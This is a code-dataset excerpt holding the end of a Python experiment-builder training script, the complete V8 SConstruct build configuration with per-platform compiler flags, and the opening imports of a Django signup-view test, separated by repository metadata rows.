ch032_1side_7__2side_7__3side_7_4side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_7_4side_5_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s7__4s5") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_7_4side_5, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_7_4side_6 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_7_4side_6_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s7__4s6") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_7_4side_6, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_7__2side_7__3side_7_4side_7 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_7__2side_7__3side_7_4side_7_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s7__2s7__3s7__4s7") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_7__2side_7__3side_7_4side_7, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
#############################################################
if(__name__ == "__main__"):
print("build exps cost time:", time.time() - start_time)
if len(sys.argv) < 2:
############################################################################################################
### 直接按 F5 或打 python step10_b1_exp_obj_load_and_train_and_test.py,後面沒有接東西喔!才不會跑到下面給 step10_b_subprocss.py 用的程式碼~~~
ch032_1side_1__2side_1__3side_1_4side_1.build().run()
# print('no argument')
sys.exit()
### 以下是給 step10_b_subprocess.py 用的,相當於cmd打 python step10_b1_exp_obj_load_and_train_and_test.py 某個exp.build().run()
eval(sys.argv[1])
|
[
"s89334roy@yahoo.com.tw"
] |
s89334roy@yahoo.com.tw
|
80540c5cae67b520926b96635014c4e26aefccd2
|
2f1f7d0711e054a96f10e849bdac5efcb45c4f39
|
/deps/v8/SConstruct
|
c7b6cdd9f20818e0de94545202ba89fd4188bb46
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
skyformat99/lbtt
|
ef25d0054ec539d6d77e25e5b0ce8febc4fdc0e8
|
6cf6418a639cc339615c3ecc6e78e1939a9cc1cb
|
refs/heads/master
| 2021-05-27T18:13:03.711188
| 2009-09-12T01:17:41
| 2009-09-12T01:17:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 28,173
|
# Copyright 2008 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import platform
import re
import sys
import os
from os.path import join, dirname, abspath
from types import DictType, StringTypes
root_dir = dirname(File('SConstruct').rfile().abspath)
sys.path.append(join(root_dir, 'tools'))
import js2c, utils
# ANDROID_TOP is the top of the Android checkout, fetched from the environment
# variable 'TOP'. You will also need to set the CXX, CC, AR and RANLIB
# environment variables to the cross-compiling tools.
ANDROID_TOP = os.environ.get('TOP')
if ANDROID_TOP is None:
ANDROID_TOP=""
# TODO: Sort these issues out properly but as a temporary solution for gcc 4.4
# on linux we need these compiler flags to avoid crashes in the v8 test suite
# and avoid dtoa.c strict aliasing issues
if os.environ.get('GCC_VERSION') == '44':
GCC_EXTRA_CCFLAGS = ['-fno-tree-vrp']
GCC_DTOA_EXTRA_CCFLAGS = ['-fno-strict-aliasing']
else:
GCC_EXTRA_CCFLAGS = []
GCC_DTOA_EXTRA_CCFLAGS = []
ANDROID_FLAGS = ['-march=armv5te',
'-mtune=xscale',
'-msoft-float',
'-fpic',
'-mthumb-interwork',
'-funwind-tables',
'-fstack-protector',
'-fno-short-enums',
'-fmessage-length=0',
'-finline-functions',
'-fno-inline-functions-called-once',
'-fgcse-after-reload',
'-frerun-cse-after-loop',
'-frename-registers',
'-fomit-frame-pointer',
'-fno-strict-aliasing',
'-finline-limit=64',
'-MD']
ANDROID_INCLUDES = [ANDROID_TOP + '/bionic/libc/arch-arm/include',
ANDROID_TOP + '/bionic/libc/include',
ANDROID_TOP + '/bionic/libstdc++/include',
ANDROID_TOP + '/bionic/libc/kernel/common',
ANDROID_TOP + '/bionic/libc/kernel/arch-arm',
ANDROID_TOP + '/bionic/libm/include',
ANDROID_TOP + '/bionic/libm/include/arch/arm',
ANDROID_TOP + '/bionic/libthread_db/include',
ANDROID_TOP + '/frameworks/base/include',
ANDROID_TOP + '/system/core/include']
ANDROID_LINKFLAGS = ['-nostdlib',
'-Bdynamic',
'-Wl,-T,' + ANDROID_TOP + '/build/core/armelf.x',
'-Wl,-dynamic-linker,/system/bin/linker',
'-Wl,--gc-sections',
'-Wl,-z,nocopyreloc',
'-Wl,-rpath-link=' + ANDROID_TOP + '/out/target/product/generic/obj/lib',
ANDROID_TOP + '/out/target/product/generic/obj/lib/crtbegin_dynamic.o',
ANDROID_TOP + '/prebuilt/linux-x86/toolchain/arm-eabi-4.2.1/lib/gcc/arm-eabi/4.2.1/interwork/libgcc.a',
ANDROID_TOP + '/out/target/product/generic/obj/lib/crtend_android.o'];
LIBRARY_FLAGS = {
'all': {
'CPPDEFINES': [''],
'CPPPATH': [join(root_dir, 'src')],
'regexp:native': {
'CPPDEFINES': ['V8_NATIVE_REGEXP']
},
'mode:debug': {
'CPPDEFINES': ['V8_ENABLE_CHECKS']
}
},
'gcc': {
'all': {
'CCFLAGS': ['$DIALECTFLAGS', '$WARNINGFLAGS'],
'CXXFLAGS': ['$CCFLAGS', '-fno-rtti', '-fno-exceptions'],
},
'mode:debug': {
'CCFLAGS': ['-g', '-O0'],
'CPPDEFINES': ['ENABLE_DISASSEMBLER', 'DEBUG'],
'os:android': {
'CPPDEFINES': ['ENABLE_DEBUGGER_SUPPORT'],
'CCFLAGS': ['-mthumb']
}
},
'mode:release': {
'CCFLAGS': ['-O3', '-fomit-frame-pointer', '-fdata-sections',
'-ffunction-sections'],
'os:android': {
'CCFLAGS': ['-mthumb', '-Os'],
'CPPDEFINES': ['SK_RELEASE', 'NDEBUG', 'ENABLE_DEBUGGER_SUPPORT']
}
},
'os:linux': {
'CCFLAGS': ['-ansi'] + GCC_EXTRA_CCFLAGS,
'library:shared': {
'CPPDEFINES': ['V8_SHARED'],
'LIBS': ['pthread']
}
},
'os:macos': {
'CCFLAGS': ['-ansi', '-mmacosx-version-min=10.4'],
},
'os:freebsd': {
'CPPPATH' : ['/usr/local/include'],
'LIBPATH' : ['/usr/local/lib'],
'CCFLAGS': ['-ansi'],
},
'os:win32': {
'CCFLAGS': ['-DWIN32'],
'CXXFLAGS': ['-DWIN32'],
},
'os:android': {
'CPPDEFINES': ['ANDROID', '__ARM_ARCH_5__', '__ARM_ARCH_5T__',
'__ARM_ARCH_5E__', '__ARM_ARCH_5TE__'],
'CCFLAGS': ANDROID_FLAGS,
'WARNINGFLAGS': ['-Wall', '-Wno-unused', '-Werror=return-type',
'-Wstrict-aliasing=2'],
'CPPPATH': ANDROID_INCLUDES,
},
'arch:ia32': {
'CPPDEFINES': ['V8_TARGET_ARCH_IA32'],
'CCFLAGS': ['-m32'],
'LINKFLAGS': ['-m32']
},
'arch:arm': {
'CPPDEFINES': ['V8_TARGET_ARCH_ARM']
},
'simulator:arm': {
'CCFLAGS': ['-m32'],
'LINKFLAGS': ['-m32']
},
'arch:x64': {
'CPPDEFINES': ['V8_TARGET_ARCH_X64'],
'CCFLAGS': ['-m64'],
'LINKFLAGS': ['-m64'],
},
'prof:oprofile': {
'CPPDEFINES': ['ENABLE_OPROFILE_AGENT']
}
},
'msvc': {
'all': {
'CCFLAGS': ['$DIALECTFLAGS', '$WARNINGFLAGS'],
'CXXFLAGS': ['$CCFLAGS', '/GR-', '/Gy'],
'CPPDEFINES': ['WIN32'],
'LINKFLAGS': ['/INCREMENTAL:NO', '/NXCOMPAT', '/IGNORE:4221'],
'CCPDBFLAGS': ['/Zi']
},
'verbose:off': {
'DIALECTFLAGS': ['/nologo'],
'ARFLAGS': ['/NOLOGO']
},
'arch:ia32': {
'CPPDEFINES': ['V8_TARGET_ARCH_IA32', '_USE_32BIT_TIME_T'],
'LINKFLAGS': ['/MACHINE:X86'],
'ARFLAGS': ['/MACHINE:X86']
},
'arch:x64': {
'CPPDEFINES': ['V8_TARGET_ARCH_X64'],
'LINKFLAGS': ['/MACHINE:X64'],
'ARFLAGS': ['/MACHINE:X64']
},
'mode:debug': {
'CCFLAGS': ['/Od', '/Gm'],
'CPPDEFINES': ['_DEBUG', 'ENABLE_DISASSEMBLER', 'DEBUG'],
'LINKFLAGS': ['/DEBUG'],
'msvcrt:static': {
'CCFLAGS': ['/MTd']
},
'msvcrt:shared': {
'CCFLAGS': ['/MDd']
}
},
'mode:release': {
'CCFLAGS': ['/O2'],
'LINKFLAGS': ['/OPT:REF', '/OPT:ICF'],
'msvcrt:static': {
'CCFLAGS': ['/MT']
},
'msvcrt:shared': {
'CCFLAGS': ['/MD']
},
'msvcltcg:on': {
'CCFLAGS': ['/GL'],
'LINKFLAGS': ['/LTCG'],
'ARFLAGS': ['/LTCG'],
}
}
}
}
V8_EXTRA_FLAGS = {
'gcc': {
'all': {
'CXXFLAGS': [], #['-fvisibility=hidden'],
'WARNINGFLAGS': ['-Wall',
'-Werror',
'-W',
'-Wno-unused-parameter',
'-Wnon-virtual-dtor']
},
'os:win32': {
'WARNINGFLAGS': ['-pedantic', '-Wno-long-long']
},
'os:linux': {
'WARNINGFLAGS': ['-pedantic'],
'library:shared': {
'soname:on': {
'LINKFLAGS': ['-Wl,-soname,${SONAME}']
}
}
},
'os:macos': {
'WARNINGFLAGS': ['-pedantic']
},
'disassembler:on': {
'CPPDEFINES': ['ENABLE_DISASSEMBLER']
}
},
'msvc': {
'all': {
'WARNINGFLAGS': ['/WX', '/wd4355', '/wd4800']
},
'library:shared': {
'CPPDEFINES': ['BUILDING_V8_SHARED'],
'LIBS': ['winmm', 'ws2_32']
},
'arch:ia32': {
'WARNINGFLAGS': ['/W3']
},
'arch:x64': {
'WARNINGFLAGS': ['/W2']
},
'arch:arm': {
'CPPDEFINES': ['V8_TARGET_ARCH_ARM'],
# /wd4996 is to silence the warning about sscanf
# used by the arm simulator.
'WARNINGFLAGS': ['/wd4996']
},
'disassembler:on': {
'CPPDEFINES': ['ENABLE_DISASSEMBLER']
}
}
}
MKSNAPSHOT_EXTRA_FLAGS = {
'gcc': {
'os:linux': {
'LIBS': ['pthread'],
},
'os:macos': {
'LIBS': ['pthread'],
},
'os:freebsd': {
'LIBS': ['execinfo', 'pthread']
},
'os:win32': {
'LIBS': ['winmm', 'ws2_32'],
},
},
'msvc': {
'all': {
'CPPDEFINES': ['_HAS_EXCEPTIONS=0'],
'LIBS': ['winmm', 'ws2_32']
}
}
}
DTOA_EXTRA_FLAGS = {
'gcc': {
'all': {
'WARNINGFLAGS': ['-Werror', '-Wno-uninitialized'],
'CCFLAGS': GCC_DTOA_EXTRA_CCFLAGS
}
},
'msvc': {
'all': {
'WARNINGFLAGS': ['/WX', '/wd4018', '/wd4244']
}
}
}
CCTEST_EXTRA_FLAGS = {
'all': {
'CPPPATH': [join(root_dir, 'src')],
'LIBS': ['$LIBRARY']
},
'gcc': {
'all': {
'LIBPATH': [abspath('.')]
},
'os:linux': {
'LIBS': ['pthread'],
},
'os:macos': {
'LIBS': ['pthread'],
},
'os:freebsd': {
'LIBS': ['execinfo', 'pthread']
},
'os:win32': {
'LIBS': ['winmm', 'ws2_32']
},
'os:android': {
'CPPDEFINES': ['ANDROID', '__ARM_ARCH_5__', '__ARM_ARCH_5T__',
'__ARM_ARCH_5E__', '__ARM_ARCH_5TE__'],
'CCFLAGS': ANDROID_FLAGS,
'CPPPATH': ANDROID_INCLUDES,
'LIBPATH': [ANDROID_TOP + '/out/target/product/generic/obj/lib'],
'LINKFLAGS': ANDROID_LINKFLAGS,
'LIBS': ['log', 'c', 'stdc++', 'm'],
'mode:release': {
'CPPDEFINES': ['SK_RELEASE', 'NDEBUG']
}
},
},
'msvc': {
'all': {
'CPPDEFINES': ['_HAS_EXCEPTIONS=0'],
'LIBS': ['winmm', 'ws2_32']
},
'library:shared': {
'CPPDEFINES': ['USING_V8_SHARED']
},
'arch:ia32': {
'CPPDEFINES': ['V8_TARGET_ARCH_IA32']
},
'arch:x64': {
'CPPDEFINES': ['V8_TARGET_ARCH_X64']
},
}
}
SAMPLE_FLAGS = {
'all': {
'CPPPATH': [join(abspath('.'), 'include')],
'LIBS': ['$LIBRARY'],
},
'gcc': {
'all': {
'LIBPATH': ['.'],
'CCFLAGS': ['-fno-rtti', '-fno-exceptions']
},
'os:linux': {
'LIBS': ['pthread'],
},
'os:macos': {
'LIBS': ['pthread'],
},
'os:freebsd': {
'LIBPATH' : ['/usr/local/lib'],
'LIBS': ['execinfo', 'pthread']
},
'os:win32': {
'LIBS': ['winmm', 'ws2_32']
},
'os:android': {
'CPPDEFINES': ['ANDROID', '__ARM_ARCH_5__', '__ARM_ARCH_5T__',
'__ARM_ARCH_5E__', '__ARM_ARCH_5TE__'],
'CCFLAGS': ANDROID_FLAGS,
'CPPPATH': ANDROID_INCLUDES,
'LIBPATH': [ANDROID_TOP + '/out/target/product/generic/obj/lib'],
'LINKFLAGS': ANDROID_LINKFLAGS,
'LIBS': ['log', 'c', 'stdc++', 'm'],
'mode:release': {
'CPPDEFINES': ['SK_RELEASE', 'NDEBUG']
}
},
'arch:ia32': {
'CCFLAGS': ['-m32'],
'LINKFLAGS': ['-m32']
},
'arch:x64': {
'CCFLAGS': ['-m64'],
'LINKFLAGS': ['-m64']
},
'simulator:arm': {
'CCFLAGS': ['-m32'],
'LINKFLAGS': ['-m32']
},
'mode:release': {
'CCFLAGS': ['-O2']
},
'mode:debug': {
'CCFLAGS': ['-g', '-O0']
},
'prof:oprofile': {
'LIBPATH': ['/usr/lib32', '/usr/lib32/oprofile'],
'LIBS': ['opagent']
}
},
'msvc': {
'all': {
'LIBS': ['winmm', 'ws2_32']
},
'verbose:off': {
'CCFLAGS': ['/nologo'],
'LINKFLAGS': ['/NOLOGO']
},
'verbose:on': {
'LINKFLAGS': ['/VERBOSE']
},
'library:shared': {
'CPPDEFINES': ['USING_V8_SHARED']
},
'prof:on': {
'LINKFLAGS': ['/MAP']
},
'mode:release': {
'CCFLAGS': ['/O2'],
'LINKFLAGS': ['/OPT:REF', '/OPT:ICF'],
'msvcrt:static': {
'CCFLAGS': ['/MT']
},
'msvcrt:shared': {
'CCFLAGS': ['/MD']
},
'msvcltcg:on': {
'CCFLAGS': ['/GL'],
'LINKFLAGS': ['/LTCG'],
}
},
'arch:ia32': {
'CPPDEFINES': ['V8_TARGET_ARCH_IA32'],
'LINKFLAGS': ['/MACHINE:X86']
},
'arch:x64': {
'CPPDEFINES': ['V8_TARGET_ARCH_X64'],
'LINKFLAGS': ['/MACHINE:X64']
},
'mode:debug': {
'CCFLAGS': ['/Od'],
'LINKFLAGS': ['/DEBUG'],
'msvcrt:static': {
'CCFLAGS': ['/MTd']
},
'msvcrt:shared': {
'CCFLAGS': ['/MDd']
}
}
}
}
D8_FLAGS = {
'gcc': {
'console:readline': {
'LIBS': ['readline']
},
'os:linux': {
'LIBS': ['pthread'],
},
'os:macos': {
'LIBS': ['pthread'],
},
'os:freebsd': {
'LIBS': ['pthread'],
},
'os:android': {
'LIBPATH': [ANDROID_TOP + '/out/target/product/generic/obj/lib'],
'LINKFLAGS': ANDROID_LINKFLAGS,
'LIBS': ['log', 'c', 'stdc++', 'm'],
},
'os:win32': {
'LIBS': ['winmm', 'ws2_32'],
},
},
'msvc': {
'all': {
'LIBS': ['winmm', 'ws2_32']
}
}
}
SUFFIXES = {
'release': '',
'debug': '_g'
}
def Abort(message):
print message
sys.exit(1)
def GuessToolchain(os):
tools = Environment()['TOOLS']
if 'gcc' in tools:
return 'gcc'
elif 'msvc' in tools:
return 'msvc'
else:
return None
OS_GUESS = utils.GuessOS()
TOOLCHAIN_GUESS = GuessToolchain(OS_GUESS)
ARCH_GUESS = utils.GuessArchitecture()
SIMPLE_OPTIONS = {
'toolchain': {
'values': ['gcc', 'msvc'],
'default': TOOLCHAIN_GUESS,
'help': 'the toolchain to use (' + TOOLCHAIN_GUESS + ')'
},
'os': {
'values': ['freebsd', 'linux', 'macos', 'win32', 'android'],
'default': OS_GUESS,
'help': 'the os to build for (' + OS_GUESS + ')'
},
'arch': {
'values':['arm', 'ia32', 'x64'],
'default': ARCH_GUESS,
'help': 'the architecture to build for (' + ARCH_GUESS + ')'
},
'regexp': {
'values': ['native', 'interpreted'],
'default': 'native',
'help': 'Whether to use native or interpreted regexp implementation'
},
'snapshot': {
'values': ['on', 'off', 'nobuild'],
'default': 'off',
'help': 'build using snapshots for faster start-up'
},
'prof': {
'values': ['on', 'off', 'oprofile'],
'default': 'off',
'help': 'enable profiling of build target'
},
'library': {
'values': ['static', 'shared'],
'default': 'static',
'help': 'the type of library to produce'
},
'soname': {
'values': ['on', 'off'],
'default': 'off',
'help': 'turn on setting soname for Linux shared library'
},
'msvcrt': {
'values': ['static', 'shared'],
'default': 'static',
'help': 'the type of Microsoft Visual C++ runtime library to use'
},
'msvcltcg': {
'values': ['on', 'off'],
'default': 'on',
'help': 'use Microsoft Visual C++ link-time code generation'
},
'simulator': {
'values': ['arm', 'none'],
'default': 'none',
'help': 'build with simulator'
},
'disassembler': {
'values': ['on', 'off'],
'default': 'off',
'help': 'enable the disassembler to inspect generated code'
},
'sourcesignatures': {
'values': ['MD5', 'timestamp'],
'default': 'MD5',
'help': 'set how the build system detects file changes'
},
'console': {
'values': ['dumb', 'readline'],
'default': 'dumb',
'help': 'the console to use for the d8 shell'
},
'verbose': {
'values': ['on', 'off'],
'default': 'off',
'help': 'more output from compiler and linker'
}
}
def GetOptions():
result = Options()
result.Add('mode', 'compilation mode (debug, release)', 'release')
result.Add('sample', 'build sample (shell, process)', '')
result.Add('env', 'override environment settings (NAME0:value0,NAME1:value1,...)', '')
result.Add('importenv', 'import environment settings (NAME0,NAME1,...)', '')
for (name, option) in SIMPLE_OPTIONS.iteritems():
help = '%s (%s)' % (name, ", ".join(option['values']))
result.Add(name, help, option.get('default'))
return result
def GetVersionComponents():
MAJOR_VERSION_PATTERN = re.compile(r"#define\s+MAJOR_VERSION\s+(.*)")
MINOR_VERSION_PATTERN = re.compile(r"#define\s+MINOR_VERSION\s+(.*)")
BUILD_NUMBER_PATTERN = re.compile(r"#define\s+BUILD_NUMBER\s+(.*)")
PATCH_LEVEL_PATTERN = re.compile(r"#define\s+PATCH_LEVEL\s+(.*)")
patterns = [MAJOR_VERSION_PATTERN,
MINOR_VERSION_PATTERN,
BUILD_NUMBER_PATTERN,
PATCH_LEVEL_PATTERN]
source = open(join(root_dir, 'src', 'version.cc')).read()
version_components = []
for pattern in patterns:
match = pattern.search(source)
if match:
version_components.append(match.group(1).strip())
else:
version_components.append('0')
return version_components
def GetVersion():
version_components = GetVersionComponents()
if version_components[len(version_components) - 1] == '0':
version_components.pop()
return '.'.join(version_components)
def GetSpecificSONAME():
SONAME_PATTERN = re.compile(r"#define\s+SONAME\s+\"(.*)\"")
source = open(join(root_dir, 'src', 'version.cc')).read()
match = SONAME_PATTERN.search(source)
if match:
return match.group(1).strip()
else:
return ''
def SplitList(str):
return [ s for s in str.split(",") if len(s) > 0 ]
def IsLegal(env, option, values):
str = env[option]
for s in SplitList(str):
if not s in values:
Abort("Illegal value for option %s '%s'." % (option, s))
return False
return True
def VerifyOptions(env):
if not IsLegal(env, 'mode', ['debug', 'release']):
return False
if not IsLegal(env, 'sample', ["shell", "process"]):
return False
if not IsLegal(env, 'regexp', ["native", "interpreted"]):
return False
if env['os'] == 'win32' and env['library'] == 'shared' and env['prof'] == 'on':
Abort("Profiling on windows only supported for static library.")
if env['prof'] == 'oprofile' and env['os'] != 'linux':
Abort("OProfile is only supported on Linux.")
if env['os'] == 'win32' and env['soname'] == 'on':
Abort("Shared Object soname not applicable for Windows.")
if env['soname'] == 'on' and env['library'] == 'static':
Abort("Shared Object soname not applicable for static library.")
for (name, option) in SIMPLE_OPTIONS.iteritems():
if (not option.get('default')) and (name not in ARGUMENTS):
message = ("A value for option %s must be specified (%s)." %
(name, ", ".join(option['values'])))
Abort(message)
if not env[name] in option['values']:
message = ("Unknown %s value '%s'. Possible values are (%s)." %
(name, env[name], ", ".join(option['values'])))
Abort(message)
class BuildContext(object):
def __init__(self, options, env_overrides, samples):
self.library_targets = []
self.mksnapshot_targets = []
self.cctest_targets = []
self.sample_targets = []
self.d8_targets = []
self.options = options
self.env_overrides = env_overrides
self.samples = samples
self.use_snapshot = (options['snapshot'] != 'off')
self.build_snapshot = (options['snapshot'] == 'on')
self.flags = None
def AddRelevantFlags(self, initial, flags):
result = initial.copy()
toolchain = self.options['toolchain']
if toolchain in flags:
self.AppendFlags(result, flags[toolchain].get('all'))
for option in sorted(self.options.keys()):
value = self.options[option]
self.AppendFlags(result, flags[toolchain].get(option + ':' + value))
self.AppendFlags(result, flags.get('all'))
return result
def AddRelevantSubFlags(self, options, flags):
self.AppendFlags(options, flags.get('all'))
for option in sorted(self.options.keys()):
value = self.options[option]
self.AppendFlags(options, flags.get(option + ':' + value))
def GetRelevantSources(self, source):
result = []
result += source.get('all', [])
for (name, value) in self.options.iteritems():
source_value = source.get(name + ':' + value, [])
if type(source_value) == dict:
result += self.GetRelevantSources(source_value)
else:
result += source_value
return sorted(result)
def AppendFlags(self, options, added):
if not added:
return
for (key, value) in added.iteritems():
if key.find(':') != -1:
self.AddRelevantSubFlags(options, { key: value })
else:
if not key in options:
options[key] = value
else:
prefix = options[key]
if isinstance(prefix, StringTypes): prefix = prefix.split()
options[key] = prefix + value
def ConfigureObject(self, env, input, **kw):
if (kw.has_key('CPPPATH') and env.has_key('CPPPATH')):
kw['CPPPATH'] += env['CPPPATH']
if self.options['library'] == 'static':
return env.StaticObject(input, **kw)
else:
return env.SharedObject(input, **kw)
def ApplyEnvOverrides(self, env):
if not self.env_overrides:
return
if type(env['ENV']) == DictType:
env['ENV'].update(**self.env_overrides)
else:
env['ENV'] = self.env_overrides
def PostprocessOptions(options):
# Adjust architecture if the simulator option has been set
if (options['simulator'] != 'none') and (options['arch'] != options['simulator']):
if 'arch' in ARGUMENTS:
# Print a warning if arch has explicitly been set
print "Warning: forcing architecture to match simulator (%s)" % options['simulator']
options['arch'] = options['simulator']
def ParseEnvOverrides(arg, imports):
# The environment overrides are in the format NAME0:value0,NAME1:value1,...
# The environment imports are in the format NAME0,NAME1,...
overrides = {}
for var in imports.split(','):
if var in os.environ:
overrides[var] = os.environ[var]
for override in arg.split(','):
pos = override.find(':')
if pos == -1:
continue
overrides[override[:pos].strip()] = override[pos+1:].strip()
return overrides
def BuildSpecific(env, mode, env_overrides):
options = {'mode': mode}
for option in SIMPLE_OPTIONS:
options[option] = env[option]
PostprocessOptions(options)
context = BuildContext(options, env_overrides, samples=SplitList(env['sample']))
# Remove variables which can't be imported from the user's external
# environment into a construction environment.
user_environ = os.environ.copy()
try:
del user_environ['ENV']
except KeyError:
pass
library_flags = context.AddRelevantFlags(user_environ, LIBRARY_FLAGS)
v8_flags = context.AddRelevantFlags(library_flags, V8_EXTRA_FLAGS)
mksnapshot_flags = context.AddRelevantFlags(library_flags, MKSNAPSHOT_EXTRA_FLAGS)
dtoa_flags = context.AddRelevantFlags(library_flags, DTOA_EXTRA_FLAGS)
cctest_flags = context.AddRelevantFlags(v8_flags, CCTEST_EXTRA_FLAGS)
sample_flags = context.AddRelevantFlags(user_environ, SAMPLE_FLAGS)
d8_flags = context.AddRelevantFlags(library_flags, D8_FLAGS)
context.flags = {
'v8': v8_flags,
'mksnapshot': mksnapshot_flags,
'dtoa': dtoa_flags,
'cctest': cctest_flags,
'sample': sample_flags,
'd8': d8_flags
}
# Generate library base name.
target_id = mode
suffix = SUFFIXES[target_id]
library_name = 'v8' + suffix
version = GetVersion()
if context.options['soname'] == 'on':
# When building shared object with SONAME version the library name.
library_name += '-' + version
env['LIBRARY'] = library_name
# Generate library SONAME if required by the build.
if context.options['soname'] == 'on':
soname = GetSpecificSONAME()
if soname == '':
soname = 'lib' + library_name + '.so'
env['SONAME'] = soname
# Build the object files by invoking SCons recursively.
(object_files, shell_files, mksnapshot) = env.SConscript(
join('src', 'SConscript'),
build_dir=join('obj', target_id),
exports='context',
duplicate=False
)
context.mksnapshot_targets.append(mksnapshot)
# Link the object files into a library.
env.Replace(**context.flags['v8'])
context.ApplyEnvOverrides(env)
if context.options['library'] == 'static':
library = env.StaticLibrary(library_name, object_files)
else:
# There seems to be a glitch in the way scons decides where to put
# PDB files when compiling using MSVC so we specify it manually.
# This should not affect any other platforms.
pdb_name = library_name + '.dll.pdb'
library = env.SharedLibrary(library_name, object_files, PDB=pdb_name)
context.library_targets.append(library)
d8_env = Environment()
d8_env.Replace(**context.flags['d8'])
shell = d8_env.Program('d8' + suffix, object_files + shell_files)
context.d8_targets.append(shell)
for sample in context.samples:
sample_env = Environment(LIBRARY=library_name)
sample_env.Replace(**context.flags['sample'])
context.ApplyEnvOverrides(sample_env)
sample_object = sample_env.SConscript(
join('samples', 'SConscript'),
build_dir=join('obj', 'sample', sample, target_id),
exports='sample context',
duplicate=False
)
sample_name = sample + suffix
sample_program = sample_env.Program(sample_name, sample_object)
sample_env.Depends(sample_program, library)
context.sample_targets.append(sample_program)
cctest_program = env.SConscript(
join('test', 'cctest', 'SConscript'),
build_dir=join('obj', 'test', target_id),
exports='context object_files',
duplicate=False
)
context.cctest_targets.append(cctest_program)
return context
def Build():
opts = GetOptions()
env = Environment(options=opts)
Help(opts.GenerateHelpText(env))
VerifyOptions(env)
env_overrides = ParseEnvOverrides(env['env'], env['importenv'])
SourceSignatures(env['sourcesignatures'])
libraries = []
mksnapshots = []
cctests = []
samples = []
d8s = []
modes = SplitList(env['mode'])
for mode in modes:
context = BuildSpecific(env.Copy(), mode, env_overrides)
libraries += context.library_targets
mksnapshots += context.mksnapshot_targets
cctests += context.cctest_targets
samples += context.sample_targets
d8s += context.d8_targets
env.Alias('library', libraries)
env.Alias('mksnapshot', mksnapshots)
env.Alias('cctests', cctests)
env.Alias('sample', samples)
env.Alias('d8', d8s)
if env['sample']:
env.Default('sample')
else:
env.Default('library')
# We disable deprecation warnings because we need to be able to use
# env.Copy without getting warnings for compatibility with older
# version of scons. Also, there's a bug in some revisions that
# doesn't allow this flag to be set, so we swallow any exceptions.
# Lovely.
try:
SetOption('warn', 'no-deprecated')
except:
pass
Build()
|
[
"lucas@l3f.org"
] |
lucas@l3f.org
|
|
954591c4ca9b4b8c04d67211df68bdaf6f07a24a
|
fdf616efcf505843621f830879ca3ff44e296772
|
/myproject/accounts/tests/test_view_signup.py
|
2c58c0ae28411268e1e00d0e5742581d73da65ba
|
[] |
no_license
|
dym0080/learn-django
|
5cbab1c9696638ffe47a3335cf33d7638fe77523
|
2d9450098f516ed887de0a953b0945ee5047d9f5
|
refs/heads/master
| 2022-05-05T12:00:23.127079
| 2020-01-09T07:52:37
| 2020-01-09T07:52:37
| 228,332,281
| 0
| 0
| null | 2022-04-22T22:58:00
| 2019-12-16T07:53:45
|
Python
|
UTF-8
|
Python
| false
| false
| 2,749
|
py
|
from django.urls import reverse, resolve
from django.contrib.auth.models import User
# from django.contrib.auth.forms import UserCreationForm
from django.test import TestCase
from ..views import signup
from ..forms import SignUpForm
